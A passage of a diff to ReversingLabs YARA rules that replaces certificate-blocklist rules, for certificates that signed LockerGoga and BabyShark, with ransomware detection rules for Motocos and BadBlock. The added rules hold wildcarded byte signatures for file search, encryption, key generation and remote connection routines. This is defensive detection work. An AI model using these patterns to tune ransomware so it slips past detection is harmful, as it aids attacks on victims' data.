8D BD ?? ?? ?? ?? EB ?? 83 C0 ?? 83 + C7 ?? 88 57 ?? 39 C1 74 ?? 0F B6 10 84 D2 75 ?? 89 BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + C6 00 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 F0 84 + C0 0F 85 ?? ?? ?? ?? 8D 5D ?? 8D 76 ?? 8D BC 27 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 + 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? + 39 F9 89 C8 76 ?? 0F B6 41 ?? 89 CF 3C ?? 0F 95 C1 3C ?? 0F 95 C2 84 D1 0F 84 ?? ?? + ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C6 07 ?? 8D 7E ?? 39 D8 89 BD ?? ?? ?? ?? 73 + ?? 0F B6 56 ?? 84 D2 74 ?? 89 F9 8B BD ?? ?? ?? ?? EB ?? 90 0F B6 11 84 D2 74 ?? 83 + C0 ?? 83 C1 ?? 88 50 ?? 39 D8 75 ?? 89 BD ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 31 + FF 89 04 24 E8 ?? ?? ?? ?? 85 C0 89 C2 74 ?? 80 38 ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 90 + 83 C7 ?? 80 3C 3A ?? 75 ?? 89 85 ?? ?? ?? ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 95 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 46 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 74 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 7C 24 ?? 89 14 24 89 + } + $encrypt_files_p2 = { + 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 89 F1 89 04 24 E8 ?? ?? ?? ?? + 83 EC ?? 89 F1 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 89 C7 8D + 40 ?? 83 F8 ?? 76 ?? 89 F1 83 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? + ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 + ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 89 + F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B + B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ?? + ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 8D 74 26 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 + E8 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 8B 45 ?? 89 1C 24 89 44 24 ?? + 8B 45 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 C6 E9 ?? ?? ?? ?? 8D 65 ?? 31 C0 5B 5E 5F 5D + C3 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 + } + $find_files_p1 = { + 8D 4C 24 ?? 83 E4 ?? FF 71 ?? 55 89 E5 57 56 53 51 81 EC ?? ?? ?? ?? 8B 31 8B 79 ?? + E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 7E ?? 89 74 24 ?? C7 04 + 24 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 8B 04 9F 89 5C 24 ?? 83 C3 ?? C7 04 24 ?? ?? ?? + ?? 89 44 24 ?? E8 ?? ?? ?? ?? 39 DE 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 47 ?? 89 04 24 + E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 + 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ?? + ?? ?? ?? F3 A5 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 C7 85 + } + $find_files_p2 = { + 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? + 8D 44 03 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 + ?? ?? ?? ?? 89 DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? + A9 ?? ?? ?? ?? 74 ?? 89 C1 00 C1 83 DA ?? C7 02 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 + 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 84 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 65 ?? 31 C0 59 5B 5E + 5F 5D 8D 61 ?? C3 C1 E8 ?? 83 C2 ?? EB ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 89 04 24 B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 + F9 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 29 CE 81 C1 ?? ?? ?? ?? C1 E9 ?? 89 45 ?? F3 + } + $find_files_p3 = { + A5 89 1C 24 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 C6 74 ?? 89 44 24 ?? C7 44 24 ?? ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 34 24 E8 ?? + ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 + ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 89 44 24 + ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? + ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "F3D LIMITED" and pe.signatures[i].serial=="4f:3f:eb:4b:af:37:7a:ea:90:a4:63:c5:de:e6:38:84" and 1526601599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3D2580E89526F7852B570654Efd9A8Bf : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Motocos : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing LockerGoga ransomware." + description = "Yara rule that detects Motocos ransomware." author = "ReversingLabs" - id = "0514759c-2d10-5b29-aa2f-d16eb45b2816" - date = "2023-11-08" - modified = "2023-11-08" + id = "cda44b86-c747-5b48-acd8-e68311ab24a3" + date = "2021-09-17" + modified = "2021-09-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2952-L2968" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0f46fcfc8ee06756646899450daa254d3e5261bdc5c2339f20d01971608fff7b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Motocos.yara#L1-L75" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "34b99847f029a291808f08ba6e6ae62a54e6fed5acc928fe4828054801786881" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Motocos" + tc_detection_factor = 5 importance = 25 + strings: + $generate_key = { + 55 8B EC 83 C4 ?? 53 89 4D ?? 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 15 + ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 ?? ?? + ?? ?? 64 FF 32 64 89 22 8B 4D ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 + ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B D8 89 5D ?? 80 + 7D ?? ?? 75 ?? 8B 5D ?? 03 DB 53 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 53 8D 45 ?? 50 8B 45 ?? 50 6A ?? 80 7D ?? ?? F5 1B C0 50 6A ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 84 C0 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 + 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? + 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? + ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? + 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C2 + } + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? + 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 D2 55 68 ?? ?? ?? ?? 64 FF + 32 64 89 22 B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B D8 8B C3 8B D8 F6 C3 ?? 74 ?? 66 83 E3 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B C3 + E8 ?? ?? ?? ?? 8B D0 B1 ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 D2 + 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 8B 10 FF 12 8B C8 8B 55 ?? A1 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B C8 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 88 45 ?? 33 C0 5A 59 59 64 + 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? + ?? EB ?? 80 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 45 ?? 89 45 ?? C6 45 ?? ?? B8 ?? ?? ?? ?? + 89 45 ?? C6 45 ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 88 45 + ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? E9 + } + $find_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 8B FA 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 + FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 7C ?? 8B 45 ?? 66 + 83 3C 58 ?? 75 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? E8 ?? ?? ?? ?? + 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 8D 45 ?? 50 8D 53 ?? 8B CE 8B 45 ?? E8 ?? ?? ?? + ?? 8B C7 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 + ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C7 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 + ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MIKL LIMITED" and pe.signatures[i].serial=="3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" and 1529888400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($generate_key) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Fffe432A53Ff03B9223F88Be1B83D9D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Badblock : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing BabyShark malware." + description = "Yara rule that detects BadBlock ransomware." author = "ReversingLabs" - id = "25a4c68b-5774-51a2-9aba-1326c85a5251" - date = "2023-11-08" - modified = "2023-11-08" + id = "a5afb7d6-4bc1-5465-a35d-fe40e7f11c3e" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2970-L2986" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e7dbe6b95877f9473661ccf26fa6e5142147609adfe0a9bb8b493875325710af" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BadBlock.yara#L1-L100" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "421e6a3772eeec6ef0cbb2427b7e044b450a2b2146cee2ca7d8c3a3a92918557" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BadBlock" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 5D ?? 89 5D ?? 89 4D ?? 89 55 ?? 8B D8 + 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? + 8B 40 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 55 + ?? 8B 45 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 + ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D + 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? + ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 6A ?? 50 52 + 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 + E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 + 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 89 45 ?? 89 55 ?? E9 ?? ?? + ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? EB ?? 7D ?? 8B 45 ?? 89 45 ?? 8B + 45 ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B D8 8B C3 + E8 ?? ?? ?? ?? 8B F0 8B D6 8B CB 8B 45 ?? 8B 38 FF 57 ?? 89 45 ?? 8B 45 ?? 8B 10 FF + 12 52 50 8B 45 ?? E8 ?? ?? ?? ?? 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 72 ?? EB ?? 5A 58 + 7C ?? 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? + 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 + ?? ?? ?? ?? 52 50 8B C3 99 29 04 24 19 54 24 ?? 58 5A 52 50 8B 45 ?? E8 ?? ?? ?? ?? + 8B D6 8B 4D ?? 8B 45 ?? 8B 38 FF 57 ?? 8B C3 99 29 45 ?? 19 55 ?? 8B D3 8B C6 E8 ?? + ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? EB ?? 0F 8F ?? ?? ?? ?? A1 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B + 48 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 8B 00 8B 80 ?? + ?? ?? ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 18 FF 53 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 + C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? + ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? + EB ?? 5F 5E 5B 8B E5 5D C3 + } + $search_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D + ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 55 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B + 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 0F 94 C3 E9 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 66 83 38 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 85 C0 75 ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? + ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0D ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 + 83 38 ?? 74 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 75 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + 8B C6 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 94 C3 84 DB 0F 85 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 8B D8 4B 85 DB 7C ?? + 43 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C6 8B 38 FF + 57 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 4B 75 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 + 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $remote_connection = { + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? + 8D 4D ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 08 FF + 51 ?? 8B 45 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 6A ?? 8D 45 ?? 50 8D 4D ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? + 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? + 8B 45 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 74 ?? C7 45 ?? ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 83 EB ?? 8B 1B 68 ?? ?? ?? ?? 8B CB + BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8D 45 + ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 45 + ?? 8B 90 ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 8B CE BA ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 + 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EGIS Co., Ltd." and pe.signatures[i].serial=="0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" and 1498524050<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_files and $encrypt_files and $remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_832E161Aea5206D815F973E5A1Feb3E7 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Moisha : 